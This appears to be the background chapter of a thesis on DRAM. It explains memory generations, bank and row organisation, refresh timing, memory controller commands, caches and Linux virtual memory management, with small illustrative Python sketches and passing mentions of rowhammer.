Graphics Double Data Rate Synchronous Dynamic RAM (GDDR SDRAM) is a type of DDR SDRAM specifically designed for video graphics rendering and used in modern PC games for realistic high-definition environments. Like DDR SDRAM, GDDR SDRAM has its own evolutionary line (improving performance and lowering power consumption): GDDR2, GDDR3, GDDR4 and GDDR5 SDRAM. The biggest difference is that bandwidth is favoured over latency, because a GPU is expected to process massive amounts of data, though not necessarily at the lowest latency. Low Power Double Data Rate memory (LPDDR) is a type of double data rate synchronous DRAM for mobile phone and tablet applications. The original low-power DDR (LPDDR1) is a slightly modified form of DDR SDRAM, with several changes to reduce power consumption. Most significantly, the supply voltage is reduced from 2.5 to 1.8 V [9]. Additionally, it exploits the fact that DRAM needs to refresh less often at low temperatures to implement a temperature-compensated refresh. It can also implement partial-array self-refresh and a deep power-down mode that deletes all memory contents. Furthermore, the chips are smaller, using less board space than their non-mobile equivalents. The different types are [9]:
 LPDDR2: A revised low-power DDR interface with low-power states similar to those of basic LPDDR, some additional array refresh options and a reduced working voltage (1.2 V). Modules are available from LPDDR2-200 to LPDDR2-1066 (clock frequencies of 100 to 533 MHz).
 LPDDR3: In comparison to LPDDR2, LPDDR3 offers a higher data rate, greater bandwidth and power efficiency, and higher memory density. LPDDR3 achieves a data rate of 1600 MT/s and utilizes key new technologies: write-levelling and command/address training [9].
Products using LPDDR3 include the 2013 MacBook Air, iPhone 5S, iPhone 6, Nexus 10, Samsung Galaxy S4 (GT-I9500) and Microsoft Surface Pro 3.  LP-DDR4: LPDDR4 doubles the data rate (up to 3200 MT/s) over the previous generation. It was designed as a two-channel die with 16 bits per channel, which lowers power consumption thanks to shorter data paths and improves operational speed. It achieves 17 GB/s per die and can still be arranged in a dual-channel configuration to reach much higher speeds. To save energy, LPDDR4 chips lower the nominal operating voltage from 1.2 V to 1.1 V [9]. The standard also supports an improved power-saving low-frequency mode, which can bring the clock speed down for further battery savings when performing simpler background tasks. Mobile SoCs using LPDDR4 RAM are, for example, Qualcomm’s Snapdragon 810 and Samsung’s Exynos 7420, which is used in both flagship offerings of the Samsung Galaxy S6 and Galaxy S6 Edge, as well as in LG’s flagship, the LG G Flex 2. A comparison table of the different LPDDR technologies is shown below [9]. Notice that all of them permit 16- or 32-bit wide channels, and that each new generation has doubled the internal fetch size and external transfer speed.


                      LPDDR2             LPDDR3             LPDDR4
Clock frequency       400 MHz            800 MHz            1600 MHz
Bandwidth             6.4 GB/s           12.8 GB/s          26.6 GB/s
Data rate (per pin)   333 ~ 1066 Mbps    800 ~ 2133 Mbps    400 ~ 3200 Mbps
Core voltage          1.8 V / 1.2 V      1.8 V / 1.2 V      1.8 V / 1.1 V
I/O voltage           1.2 V              1.2 V              1.1 V
I/O width             x16/x32            x16/x32            2 ch x16 (total x32 per die)
Prefetch              4n                 8n                 16n
Number of banks       4/8                8                  8 per channel (total 16 per die)
Burst length          4/8/16             8                  16/32/on the fly
Density               64 Mb ~ 8 Gb       4 Gb ~ 32 Gb       8 Gb ~ 32 Gb
Table 2 LPDDR technical characteristics

2.3 DRAM ARCHITECTURE A modern DRAM system is organized hierarchically into channels, DIMMs, ranks, banks, and cells. Multiple memory channels, each handled by its own dedicated memory controller, are independent and can be accessed in parallel. Multiple DIMM physical modules can then be connected to each channel. Each of these modules is organized in ranks, typically two ranks corresponding to the front and the back of the physical module. Each rank, which consists of several DRAM chips, is further partitioned into multiple banks. The architecture of a 64-bit wide DIMM module is shown in Figure 3. Each rank contains 8 banks spread through 8 different DRAM chips [11].

Figure 3 DIMM modules architecture example


DRAM chips are manufactured in different configurations, ranging in capacity from 1 to 8 Gbit and in data bus width from 4 to 16 pins (2.1.1). That is why multiple DRAM chips are commonly grouped together to provide a larger capacity and a wider data bus. Each DRAM chip consists of multiple banks (associated in groups of two (DDR), four (DDR2), or eight (DDR3, DDR4)) (2.1.1), and each bank contains a two-dimensional array of DRAM cells organized in rows and columns. Apart from the memory array, each bank also features a row buffer between the DRAM cells and the memory bus. Each DRAM cell consists of a capacitor and an access transistor. The charged or discharged state of the capacitor is used to represent a binary data value. A wordline connects all cells in the horizontal direction; raising it connects each cell capacitor of the row to its respective bitline by activating all the cell transistors of the row. A bitline connects all cells in the vertical direction and allows the row data to be transferred to the row buffer. When a row's wordline is raised, the row buffer (also called the sense amplifier) reads out the charge of the row cells through the bitlines, destroying the data in the cells, and immediately writes the charge back into them. Subsequently, requests addressed to the currently active row are served directly from this buffer. If a different row needs to be accessed, the currently active row is first closed, by lowering its wordline, and then the new row is fetched. Such an event leads to a significantly higher access time compared to same-row requests served directly by the row buffer, and is called a row conflict. Furthermore, circuitry in the memory array includes row and column address decoding logic to select the correct data, and internal counters to keep track of refresh cycles.
In addition, DRAM chips often include additional storage for ECC (error-correction code) or parity bits, to enable detection or correction of errors in the data array. Each bank has dedicated sense amplifiers and peripheral circuitry, so that multiple banks can process memory requests in parallel, which is essential to achieve sustained high bandwidth. Multiple DRAM chips are wired together to build a rank with a wider data bus. All the devices in the rank share address, command and control signals, and serve and receive the same requests. Table 3 shows the organization parameters of DDRx and LPDDRx devices as an example.

Parameter         DDR2        DDR3        DDR4         LPDDR3
Bank groups       1           1           2/4          1
Banks             4/8         8           8/16         8
Rows per bank     4K – 64K    4K – 64K    16K – 256K   16K – 32K
Columns per row   512 – 2K    1K – 4K     1K           1K – 4K
I/O bits          4/8/16      4/8/16      4/8/16       16/32
Table 3 DDRx and LPDDRx organization parameters

The smallest fixed-length contiguous block of physical memory onto which an OS (Operating System) maps a memory page (contiguous virtual memory) is called a page frame. It is a contiguous piece of memory aligned on a page-size boundary. To calculate the page size (also called row size) for a specific DRAM technology, it is necessary to analyze the specific memory architecture: the number of contiguous banks in the rank across which the memory page is segmented, and the organization parameters of the specific DRAM.


The 2 GB DDR3 DIMM [12] (Figure 4) is undoubtedly the most popular density choice among today's users. It is configured as two identical ranks of eight banks each; one side of the DIMM houses the ICs that make up Rank 1, with Rank 2 populating the opposite face of the module. The full module contains a total of 16 ICs (Integrated Circuits), eight per side. Each IC contains 8 banks of addressable memory. Each bank contains 16K pages (16,384 rows/bank) and 1K column addresses (1,024 column addresses/row), with each column storing an 8-bit word (1 B per column address). The total memory space of the IC is therefore 128 MB (16,384 [rows/bank] x 1,024 [column addresses/row] x 1 [Byte/column address] x 8 [stacked banks]). Each rank is 1 GB (128 MB x 8 contiguous banks), hence 2 GB per module. Each bank row contains 1,024 column addresses of 1 B (an I/O width of 8 bits), which means it holds 1 KB. It is important to notice that each memory page (row) is segmented evenly across bank n of each IC of the associated rank. For this reason, the memory page (row) is 8 KB (1 [KB] x 8 [contiguous banks]): each memory page (row) is composed of 8 bank rows, one from each of the 8 contiguous banks. To understand the memory addressing it is critical to know the difference between the IC density, which refers, in this example, to eight distinct stacked banks, and the page space, where we are really working with n contiguous banks spread across the total number of ICs per rank.

Figure 4 2GB DDR3 DIMM architecture. Figure in [12]
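The capacity and page-size arithmetic above can be reproduced in a few lines. This is just a sketch re-deriving the figures quoted in the text for this particular 2 GB DDR3 module:

```python
# Sketch: 2 GB DDR3 DIMM arithmetic (values from the text).
rows_per_bank  = 16 * 1024   # 16K rows per bank
cols_per_row   = 1024        # column addresses per row
bytes_per_col  = 1           # x8 chip: each column address stores 1 byte
banks_per_ic   = 8
ics_per_rank   = 8           # 8 chips side by side form the 64-bit data bus
ranks_per_dimm = 2

ic_bytes   = rows_per_bank * cols_per_row * bytes_per_col * banks_per_ic
rank_bytes = ic_bytes * ics_per_rank
dimm_bytes = rank_bytes * ranks_per_dimm

row_in_one_chip = cols_per_row * bytes_per_col    # 1 KB bank row per chip
memory_page     = row_in_one_chip * ics_per_rank  # row striped across 8 chips

print(ic_bytes // 2**20)    # 128 (MB per IC)
print(dimm_bytes // 2**30)  # 2   (GB per module)
print(memory_page // 1024)  # 8   (KB per DRAM row / memory page)
```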


2.4 REFRESH MECHANISM ON DDR TECHNOLOGIES In order to retain the data stored in the DRAM cells, a periodic refresh operation is necessary, which incurs both performance and energy overhead. The refresh overhead on real systems has been simulated and demonstrated in [13] [14] [15]. Each refresh consumes energy, producing an energy consumption overhead, and the DRAM rank/bank is unavailable while being refreshed, inducing performance degradation. QoS is impacted because the refresh operation degrades system performance by increasing the latency of memory accesses, and it also limits DRAM capacity scaling [15]. Furthermore, the refresh penalty increases significantly with increasing device density: if the number of rows to be refreshed is larger, the time the bus is occupied with refresh commands is longer, the time rows are unavailable because their storage capacitors are being recharged is higher, and the power needed to keep the DRAM system refreshed scales up. To simplify refresh management, each DRAM device has an internal refresh counter that tracks the rows to be refreshed by the next refresh operation. The memory controller is responsible for issuing AR (Auto Refresh) commands at the appropriate times. Each DRAM cell must be refreshed or accessed at least once within its retention time. Most commodity DRAM devices set this RI (refresh interval) to either 32 ms or 64 ms, depending on the operating temperature and DRAM type. Within an RI, the memory controller must issue enough AR commands to ensure that every row is refreshed exactly once. The time between two AR commands is specified by tREFI. Therefore, the memory controller should issue at least RI/tREFI AR commands within a refresh window (RI) to ensure that every cell is refreshed before its retention time expires. The refresh options can be categorized based on the command granularity: rank, bank and row level.
General-purpose DDRx devices only have the all-bank AR command at the entire rank level; all the banks in the device are unavailable while an AR command is performed. For example, a DDR3 DRAM rank has a tREFI of 7.8 us and an RI of 64 ms; therefore, refreshing the rank requires 8192 refresh commands to be issued by the memory controller in an RI window [15]. The number of rows refreshed by each AR command depends on the total number of rows in the DRAM. For example, if the device referred to earlier has 8192 rows per bank, each AR command needs to refresh just one row per bank. However, for a DDR device with 65536 rows per bank, each AR command must refresh 8 rows in each bank. So the number of rows to be refreshed by a single AR increases with memory density, and therefore the tRFC (refresh completion time) also increases. On the other hand, LPDDRx devices also have the option of per-bank AR, an additional finer-granularity refresh scheme. Just one bank is down when such an AR is issued, while the other banks can still serve normal memory requests. It splits the AR command into eight separate operations scattered across the eight banks, so the command is issued eight times more frequently. By scattering the all-bank auto refresh into multiple non-overlapping per-bank refresh operations, the refresh latency tRFC becomes shorter than before. This can be used to meet the deadlines of real-time applications [15]. In addition, LPDDRx devices dedicate more resources to reducing background power. Specifically, two important techniques are used in LPDDRs: a temperature-compensated refresh rate guided by on-chip temperature sensors, and the

partial array self-refresh (PASR) option, where the controller has the ability to refresh only a certain portion of the memory [14].

Table 4 shows the tREFI and tRFC at the default RI values for several DRAM generations and device sizes. The tRFC varies significantly with the size of a given DRAM architecture. DDR2 and DDR3 devices are specified to keep tREFI constant (7.8 us), but with a different tRFC period according to the device density. DDR4 introduces a fine-granularity refresh mode that allows tREFI to be programmed, because tRFC becomes prohibitively long for high-density devices. The 2x or 4x mode divides tREFI by 2 or 4, respectively, and consequently the number of rows refreshed by a single refresh command is also divided by 2 or 4. This results in a shorter tRFC, at the cost of issuing 2x or 4x as many AR commands in an RI window. Besides, the additional per-bank auto refresh technique included in LPDDR3 helps to reduce the refresh completion time [14].

Device    tREFI (us)  RI (ms)  tRFC (ns)
                               1 Gb    2 Gb    4 Gb    8 Gb
DDR2      7.8         64       127.5   197.5   327.5   -
DDR3      7.8         64       110     160     300     350
DDR4 1x   7.8         64       -       160     260     350
DDR4 2x   3.1         64       -       110     160     160
DDR4 4x   1.95        64       -       -       130     210
LPDDR3    3.9         32       -       -       60      90
Table 4 DRAM timings
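The AR command budget described above follows directly from RI and tREFI. A small sketch, using the exact spec value tREFI = 7.8125 us (usually quoted rounded as 7.8 us):

```python
# Sketch: auto-refresh (AR) command budget for a DDR3 rank.
RI_us    = 64_000     # 64 ms refresh window
tREFI_us = 7.8125     # exact spec value (quoted as 7.8 us in datasheets)

ar_per_window = int(RI_us / tREFI_us)  # AR commands the controller must issue
print(ar_per_window)                   # 8192

# Rows refreshed per AR command grows with density:
for rows_per_bank in (8192, 65536):
    print(rows_per_bank, "->", rows_per_bank // ar_per_window, "row(s) per AR")
    # 8192  -> 1 row(s) per AR
    # 65536 -> 8 row(s) per AR
```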

The retention time is highly sensitive to temperature. Leakage increases as temperature increases, therefore shorter retention times are necessary. As a result, at extended temperatures (i.e., 85–95 °C), DDRx devices must increase the refresh rate. This is the reason why LPDDRx devices adjust the refresh rate according to the temperature.

2.5 DRAM MEMORY CONTROLLER The memory controller must service DRAM requests while obeying the timing constraints of the DRAM chips and ensuring the correct operation of the DRAM. Below we summarize its tasks that play a crucial role in rowhammer [11] [1] [16].  Translate physical addresses into channels, DIMMs, ranks, and banks. For a typical memory architecture, the controller does not need to deal with individual chips, because all chips on one DIMM (rank) side are operated in the same way, responding to a single command. While AMD publicly documents the addressing function used by its products, most companies do not. An application therefore cannot directly know which bank it is accessing.  Buffer and schedule requests to improve performance. Resolve the bank, bus and channel conflicts that can be produced by parallel addressing accesses. The multiple banks allow concurrent DRAM accesses, so DRAM controllers often randomize the address mapping to


banks so that bank conflicts are less likely. The conflicts between different channels must also be managed, but this is easier because of the separate data buses of each channel.  Guide the access to a specific bank of a rank by following the next three steps, issuing the corresponding commands and addresses: 1. ACTIVATE Bank, Row: command that opens the specified row of the specified bank to transfer the row data into the bank's row buffer. 2. READ/WRITE Bank, Column: commands that access the desired column of the specified bank from the row buffer (read or write). 3. PRECHARGE Bank: command that closes the row and prepares the bank for the next access by clearing the row buffer. The DRAM memory controller can optimize memory performance by cleverly deciding the command steps of each access, or cleverly deciding when to close a row pre-emptively. The open-page memory control policy keeps the most recently accessed row open in the row buffer. This policy is generally used to improve memory access latency, power consumption, and bank utilization by exploiting the temporal locality of memory accesses when the number of memory accesses is low. By contrast, the closed-page policy and other more complex policies have been proposed and implemented in current processor architectures [17] [18], and are especially better on multi-core systems [19]. The closed-page policy pre-emptively closes rows earlier than necessary to optimize system performance, since the bank is then precharged and ready to open a new row before the next access. Modern processors include huge caches and complex algorithms for spatial and temporal prefetching, which decrease the probability that a further access goes to the same row. Due to the notable increase in the number of memory accesses, the closed-page policy, but also other policies which pre-emptively close rows, is being implemented to increase performance in this new system reality.
 Guarantee the DRAM timing constraints, which are specific to each DRAM technology (2.2). One example is the timing constraint defined between a pair of ACTIVATE commands to the same row in the same bank, referred to as the row cycle time t_RC. The speed of the processor and the bus speed of the system motherboard are the limiting factors on the speed of the RAM installed in a system.  Refresh the DRAM by reading each row periodically to restore the charge. Within the retention time window, given by the specification of the DRAM standard, the memory controller must issue enough refresh commands to ensure that every row is refreshed exactly once. A refresh command can refresh many rows at a time, but every read of a row also restores the charge of its cells to the full value.
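The ACTIVATE / READ-WRITE / PRECHARGE sequence and the open-page policy can be illustrated with a toy model of one bank (a sketch; the class and method names are ours, and timings are ignored):

```python
# Sketch: a toy open-page memory controller for a single DRAM bank.
class Bank:
    def __init__(self):
        self.open_row = None         # row currently latched in the row buffer

    def access(self, row):
        """Return the command sequence needed to serve an access to `row`."""
        if self.open_row == row:                  # row-buffer hit
            return ["READ/WRITE"]
        cmds = []
        if self.open_row is not None:             # row conflict
            cmds.append("PRECHARGE")              # close the open row first
        cmds += ["ACTIVATE", "READ/WRITE"]        # open and access the new row
        self.open_row = row
        return cmds

bank = Bank()
print(bank.access(5))  # ['ACTIVATE', 'READ/WRITE']              (bank idle)
print(bank.access(5))  # ['READ/WRITE']                          (buffer hit)
print(bank.access(9))  # ['PRECHARGE', 'ACTIVATE', 'READ/WRITE'] (row conflict)
```

The extra PRECHARGE + ACTIVATE on a conflict is exactly the higher-latency path a rowhammer attacker must force repeatedly to keep re-opening the aggressor rows.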

2.6 MEMORY HIERARCHY A multilevel memory hierarchy takes advantage of locality and of the cost-performance of memory technologies to satisfy the need for rising processing performance as well as large amounts of fast-access memory. The principle of locality says that most programs do not access all code and data uniformly; instead, locality occurs in time and space. Likewise, smaller hardware can be accessed faster and, the faster the memory, the bigger the cost. This leads to a hierarchy organized into several levels, each one smaller, faster, and more expensive per bit than the next lower level [20]. The levels in a typical memory hierarchy of embedded, desktop, and server computers are shown in Figure 5. The memory becomes slower and larger as we move farther away from the processor.

Figure 5 Typical memory hierarchy 1

The main memory is used to store the data that is currently processed by the CPU. It uses DRAM because DRAM is much faster to access than other kinds of storage, such as a hard disk drive (HDD), solid-state drive (SSD) or optical drive. RAM is a volatile memory, and each time the system is rebooted the OS and other files are reloaded into it from the disk. Caches exploit both types of locality: temporal locality, by remembering the contents of recently accessed locations, and spatial locality, by fetching blocks of data around a recently accessed location. A cache therefore contains a copy of parts of main memory. When a word is not found in the cache, it must be fetched from memory and placed in the cache, as shown below in Figure 6. On each fetch from memory, multiple words, called a block (or line), are moved for efficiency reasons. Each cache block includes a tag indicating which memory address it corresponds to. In the most popular scheme, set associativity, a block is first mapped onto a set. The set is chosen by the address of the data and is composed of more than one cache position. In that case, an address can be mapped anywhere within that set. Finding a block then consists of first mapping the block address to the set and then searching the set to find the block. The cache placement is called n-way set associative, where n is the number of blocks in a set. A direct-mapped cache has just one block per set, so a block is always placed in the same location; on the other hand, a fully associative cache has just one set, so a block can be placed anywhere [20]. When there is no space available in a cache, a replacement algorithm is used to decide which place in the cache will be evicted. Four of the most common cache replacement algorithms are: the Least Recently Used (LRU) algorithm, which selects for replacement the item that has been least recently used by the CPU; the First-In-First-Out (FIFO) algorithm, which replaces the item that is the

1 Copyright: E. Science, (USA), 2013.

longest time in the cache; the Least Frequently Used (LFU) algorithm, which selects the item that has been least frequently used by the CPU; and the Random algorithm, which selects an item randomly.

Figure 6 Cache placement. Figure in [20]
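The set-associative lookup just described amounts to slicing the address into tag, set index and block offset. A sketch, with an illustrative geometry (64 B lines, 2048 sets) rather than any specific CPU's:

```python
# Sketch: splitting an address for a set-associative cache lookup.
# Hypothetical geometry: 64 B lines (6 offset bits), 2048 sets (11 index bits).
LINE_BITS = 6
SET_BITS  = 11

def cache_slot(addr):
    offset = addr & ((1 << LINE_BITS) - 1)               # byte within the line
    index  = (addr >> LINE_BITS) & ((1 << SET_BITS) - 1) # which set to search
    tag    = addr >> (LINE_BITS + SET_BITS)              # identifies the block
    return tag, index, offset

tag, index, offset = cache_slot(0x1234567)
print(hex(tag), index, offset)   # 0x91 1301 39
```

Only the n ways of set `index` need to be searched for a matching `tag`; in a direct-mapped cache n = 1, and in a fully associative cache SET_BITS = 0.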

The hierarchy must guarantee consistency between the copy in the cache and the memory. When a memory write operation is performed, the CPU first writes into the cache memory. These modifications then need to be written back to main memory, and there are two main strategies. The write-through scheme updates the item in the cache and writes through to update main memory as well. On the contrary, in the write-back scheme the copy is made just in the cache and, when the block is about to be replaced, it is copied back to memory. Both strategies can use a write buffer to allow the cache to proceed as soon as the data is placed in the buffer, avoiding the full latency of writing the data into memory [20]. Most contemporary computers have at least 2 levels of cache: a primary L1 cache attached to the CPU, and an external L2 cache typically built with fast SRAM. Modern high-end embedded, desktop and server microprocessors may have as many as six types of cache (between levels and functions). Note that in this complex bus organization, with shared memory and multiple caches, coherency must be maintained between caches, as well as between cache and memory. Intel processors have 4 levels of cache. The L3 or LLC (Last Level Cache) is an inclusive cache, which means that all data in the L1 and L2 caches is also present in the L3. The L3 is shared among all cores, and the L4, present in some Haswell and Broadwell CPUs, is used for video memory and to hold evicted data from the L3 cache. The ARM architectures, in contrast, usually have just a two-level cache, where the L2 is shared among the different cores due to space limitations on the SoC. Intel has not disclosed the cache replacement policy of their CPUs, but for some architectures it has been reverse-engineered [21]. On modern x86 CPU architectures, the most widespread policy is LRU or pseudo-LRU.
Instead, on ARM architectures, a pseudo-random replacement policy is usually adopted, because it is easier to implement in hardware and has higher energy efficiency compared to other policies.
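The write-through versus write-back distinction above can be sketched with a toy one-block cache (class and attribute names are ours; a real cache tracks a dirty bit per line):

```python
# Sketch: write-through vs write-back for a single cached block.
class Cache:
    def __init__(self, memory, write_back=True):
        self.memory, self.write_back = memory, write_back
        self.block, self.addr, self.dirty = None, None, False

    def write(self, addr, value):
        self.block, self.addr = value, addr
        if self.write_back:
            self.dirty = True              # defer the main-memory update
        else:
            self.memory[addr] = value      # write through immediately

    def evict(self):
        if self.write_back and self.dirty:  # copy back only on replacement
            self.memory[self.addr] = self.block
        self.block, self.dirty = None, False

mem = {}
wb = Cache(mem, write_back=True)
wb.write(0x40, "new")
print(mem.get(0x40))   # None - main memory is stale until eviction
wb.evict()
print(mem[0x40])       # new
```

This stale window is why rowhammer code must explicitly flush or evict cache lines: with write-back caching, repeated writes alone never reach the DRAM row.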


The mapping from physical addresses to cache slices is performed by a complex addressing function (H) that takes as input part of the physical address (Figure 7). Note that H is undocumented, but researchers have worked toward its reverse engineering. The slice addressing in modern processors is implemented by computing a complex hash function. The last-level cache addressing functions for Intel architectures have been reverse-engineered in the works [22] [23]. A combination of the previously mentioned research is presented in [3] in the form of a table, Figure 8. The table shows the combination of bits from the physical address whose output indicates which of the four cache slices the physical address maps to.

Figure 7 Complex addressing scheme in the LLC, 64 B cache line, 4 slices and 2048 sets per slice. Figure in [22]

Figure 8 Complex addressing function. Figure in [22]
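Such functions are typically XORs of selected physical-address bits. The sketch below shows the general shape only: the bit masks are illustrative placeholders, not the actual Intel functions recovered in [22] [23].

```python
# Sketch: an XOR-of-address-bits slice hash, in the style of the
# reverse-engineered LLC functions. Masks below are HYPOTHETICAL.
def parity(x):
    """XOR of all bits of x (1 if the popcount is odd)."""
    p = 0
    while x:
        p ^= 1
        x &= x - 1          # clear the lowest set bit
    return p

# Each mask selects the physical-address bits XORed into one output bit;
# two output bits address one of four slices.
H_MASKS = [0x1B5F575440, 0x2EB5FAA880]   # hypothetical h0, h1

def slice_of(phys_addr):
    return sum(parity(phys_addr & m) << i for i, m in enumerate(H_MASKS))

print(slice_of(0x3F8A1C40))   # some value in 0..3
```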

2.7 PHYSICAL RAM MANAGEMENT ON LINUX All the physical RAM is classified into frames that are allocated dynamically to processes by the Memory Management Unit [24]. How the physical RAM is allocated for hardware devices, kernel code, and dynamic memory is shown in Figure 9.


Figure 9 Layout Memory. Figure in [25]

Linux classifies RAM into zones due to hardware limitations in some old architectures. The LOW memory (the DMA and Normal zones) is memory for which logical addresses exist in the kernel space. On the other hand, HIGHMEM is a part that is not directly addressable and, to be used, must be temporarily mapped into NORMAL. Note that this approach responds to commercial pressure to support more memory while not breaking 32-bit application and system compatibility: even 32-bit processors can then address more than 4 GB of physical memory. A typical memory zone distribution for an 8 GB RAM system on both 32-bit and 64-bit architectures [24] is shown in Figure 10.

Figure 10 Memory zone for 8GB RAM. Figure in [24]

The Linux system deals with several types of addresses, for different situations [26]. User virtual addresses: regular addresses seen by user-space programs. Each process has its own virtual address space, whose length depends on the underlying hardware architecture (32 or 64 bits). Physical addresses: the addresses used between the processor and the system's memory. Even 32-bit systems can sometimes use larger physical addresses.


Bus addresses: the addresses used between peripheral buses and memory. Often they are the same as the physical addresses used by the processor, but they are highly architecture dependent, and some architectures provide an I/O memory management unit (IOMMU) that remaps addresses between a bus and main memory. Kernel logical addresses: the normal address space of the kernel. They map some portion (or all) of main memory and are often treated as if they were physical addresses. On most architectures, a logical address differs only by a constant offset from its associated physical address. Kernel virtual addresses: mappings from a kernel-space address to a physical address. Many kernel virtual addresses are not logical addresses, but all logical addresses are kernel virtual addresses. The relation between these address types and the physical high and low memory zones is shown in Figure 11 below.

Figure 11 Depicts a kernel allocation overview. Figure in [26]

An overview of memory allocation in the Linux kernel is shown in Figure 12. The SLAB allocator relies on the page allocator and manages the allocation of small (byte-sized) low-memory requests. Its specific algorithm produces less fragmentation and takes less time to initialize objects than the buddy allocator. It is used internally by the kernel for data structures and to create caches containing objects of the same size [28]. The main kernel memory allocator is the kmalloc allocator, which allocates a physically contiguous buffer, of small size by using the SLAB allocator, or of big size by using the page allocator. On the other hand, the vmalloc allocator allocates memory that is only virtually contiguous, by allocating non-contiguous chunks of physical memory and mapping them via page tables into a contiguous range of virtual address space [29].


The principal algorithm used to manage and allocate physical pages (the page allocator) in the Linux kernel is the buddy allocator, which has been shown to be extremely fast in comparison to other allocators. The basic concept is quite simple. Memory is broken up into large blocks of pages. Each block in the system has an order, an integer n ranging from 0 to a specific upper level. The size of an order-n block is 2^n pages. Power-of-two block sizes make address computation simple, because all buddies are aligned on memory address boundaries that are powers of two. Whenever a memory request comes, it is assigned the smallest possible block (power of 2) available. If a block of the desired size is not available, the algorithm looks for the next larger block available and splits it into two halves (buddies). If only a larger area is available, it is split repeatedly until the desired block size is reached [30]. When a larger block is split, it is divided into two smaller blocks, and each smaller block becomes the unique buddy of the other. A split block can only be merged with its unique buddy block, which then reforms the larger block they were split from. When an area is freed, it is checked whether its buddy is free as well, in which case they are merged. The kernel attempts to merge pairs of free buddy blocks of size b into a single block of size 2b. The algorithm is iterative: if it succeeds in merging released blocks, it doubles b and tries again to create even bigger blocks. The page allocator API describes specific flags that specify the action, zone, and type of a memory allocation.

Figure 12 Allocators in the Kernel overview. Figure in [27]

Linux makes use of two different buddy systems: one handles the page frames suitable for ISA DMA, while the other one handles the remaining page frames.
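The split-and-merge mechanics of the buddy system can be sketched in a few lines. This is a toy model in page units, not the kernel's implementation; note how a block's buddy address is found by flipping a single bit:

```python
# Sketch: a minimal buddy allocator over 2^n-page blocks (addresses in pages).
MAX_ORDER = 4                        # blocks of 1..16 pages
free_lists = {o: [] for o in range(MAX_ORDER + 1)}
free_lists[MAX_ORDER].append(0)      # one free 16-page block at page 0

def alloc(order):
    for o in range(order, MAX_ORDER + 1):
        if free_lists[o]:
            addr = free_lists[o].pop()
            while o > order:                          # split to the right size
                o -= 1
                free_lists[o].append(addr + (1 << o)) # free the upper buddy
            return addr
    return None                                       # out of memory

def free(addr, order):
    while order < MAX_ORDER:
        buddy = addr ^ (1 << order)       # buddies differ in exactly one bit
        if buddy not in free_lists[order]:
            break
        free_lists[order].remove(buddy)   # merge with the free buddy...
        addr = min(addr, buddy)
        order += 1                        # ...and try the next order up
    free_lists[order].append(addr)

a = alloc(1)     # a 2-page block: splits 16 -> 8 -> 4 -> 2
b = alloc(1)
print(a, b)      # 0 2
free(a, 1); free(b, 1)
print(free_lists[MAX_ORDER])   # [0]  (everything merged back)
```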

2.8 MEMORY MANAGEMENT Modern systems provide an abstraction of main memory known as Virtual Memory (VM). The addresses seen by user programs do not correspond directly to the physical address

since each process is provided with a large, uniform and private address space. In this way, the programs running in the system are allowed to allocate more memory than is physically available, by efficiently treating the memory as a cache for address spaces stored on disk. Aside from simplifying memory management, this also protects the address space of each process from corruption by other processes. It is the basis of built-in memory protection: one process's RAM is inaccessible and invisible to other processes, and kernel RAM is invisible to a user-space process. The CPU accesses main memory by generating a virtual address that is converted to a physical one before being sent to the memory. These capabilities are provided by a combination of operating system software, address translation hardware in the MMU (memory management unit), and a data structure stored in physical memory known as a page table, which maps virtual pages to physical pages. The address translation is done by the MMU, which transparently handles all memory accesses, from LOAD/STORE instructions on RISC or from any instruction accessing memory on CISC. It maps memory accesses not just from virtual addresses to system RAM but also from virtual addresses to memory-mapped peripheral hardware, and it is also responsible for handling the permissions and generating the page fault exception on an invalid access. The operating system is responsible for maintaining the contents of the page table and transferring pages back and forth between disk and DRAM. The page table is an array of page table entries (PTEs), one entry for each virtual page of the process (Figure 13). Each entry maps a virtual page number (VPN) to a physical page number (PPN), using the VPN as an index into the array. Each PTE also includes auxiliary information about the page, such as a present bit, a dirty or modified bit, and address space or process ID information, amongst others.
For regular x86-32 paging, a PTE is a simple 4-byte record, as shown below in Figure 14.

Figure 13 x86 Page Table Entry (PTE). Figure in [31]

Figure 14 Virtual to Physical Mapping for x86-32bit Page Table Entry. Figure in [31]

The address translation mechanism would slow down main memory read performance by a factor of two, since it would be necessary to read the page table in addition to accessing each memory location. To

reduce this overhead, a translation lookaside buffer (TLB) is typically present. The TLB is an associative cache of recently used page table entries (PTEs). When a virtual address needs to be accessed, the TLB is searched; if a match is found, the physical address is returned and accessed directly. If a match is not found, the MMU detects the miss and does a regular lookup in the page table. It then evicts one old entry from the TLB and replaces it with the new one, so that the next time the PTE for that page will be found there. An overview of the virtual memory system is shown in Figure 15.

Figure 15 Virtual Memory System scheme. Figure in [32]

One page table for each process must be placed in physical main memory, which could require unacceptable space. A more manageable multi-level scheme is therefore often used. Every virtual address must then be broken up into parts that yield offsets within these page table levels plus an offset within the actual page. The n-bit virtual address has two components: a p-bit virtual page offset (VPO) and an (n-p)-bit virtual page number (VPN). The VPN is broken up into k offsets, one for each PTE level. The MMU uses the last-level VPN to select the appropriate PTE. The corresponding physical address is then the concatenation of the physical page number (PPN) from the last-level PTE and the VPO from the virtual address. The VPO is identical to the PPO because the physical and virtual pages are both P bytes, so it maps directly to the offset that points to the specific address inside the physical page. An overview of the virtual-to-physical memory mapping is shown below in Figure 16.
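The VPN/VPO split and the TLB fast path can be sketched together. The example below assumes 4 KB pages (a 12-bit VPO) and a flat, single-level toy page table; the dictionary entries are hypothetical:

```python
# Sketch: virtual-to-physical translation with a tiny TLB.
# Hypothetical geometry: 4 KB pages -> 12-bit virtual page offset (VPO).
PAGE_BITS = 12

page_table = {0x1: 0xbeef, 0x2: 0xcafe}   # VPN -> PPN (toy entries)
tlb = {}                                  # small cache of recent PTEs

def translate(vaddr):
    vpn = vaddr >> PAGE_BITS
    vpo = vaddr & ((1 << PAGE_BITS) - 1)
    if vpn in tlb:                    # TLB hit: no page-table walk needed
        ppn = tlb[vpn]
    else:                             # TLB miss: walk the table, refill TLB
        ppn = page_table[vpn]         # unmapped VPN would fault here
        tlb[vpn] = ppn
    return (ppn << PAGE_BITS) | vpo   # PPO is identical to the VPO

print(hex(translate(0x1abc)))   # 0xbeefabc
print(1 in tlb)                 # True - the next access to VPN 1 hits the TLB
```

In a real multi-level walk the VPN is further split into k indices, one per page-table level, but the concatenation of PPN and VPO at the end is the same.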


Figure 16 Virtual to Physical Address mapping. Figure in [32]

